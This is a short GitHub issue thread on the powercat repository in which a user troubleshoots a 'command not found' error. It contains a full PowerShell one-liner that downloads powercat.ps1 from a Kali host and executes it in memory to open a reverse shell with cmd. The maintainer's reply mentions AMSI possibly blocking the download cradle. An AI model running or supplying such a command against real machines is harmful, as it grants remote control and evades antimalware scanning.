### ISSUE TITLE
Power Cat command not found on CMD Windows

### ISSUE THREAD

**Issue by Vedant-Bhalgama** [besimorhino/powercat#22]
`powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/powercat.ps1');powercat -c 10.0.2.4 -p 1234 -e cmd"	`

I am using this command for downloading powercat from my kali server and then opening a shell connection, But it says this error

![Capture](https://user-images.githubusercontent.com/67494275/88458532-60166a80-ceac-11ea-9861-193dac4c956e.PNG)

**Comment by besimorhino** [comment]
Can you please give more info on what you are doing on your kali box to serve up powercat?

Also, are you sure AMSI is not stopping your download cradle? 

Please let us know.
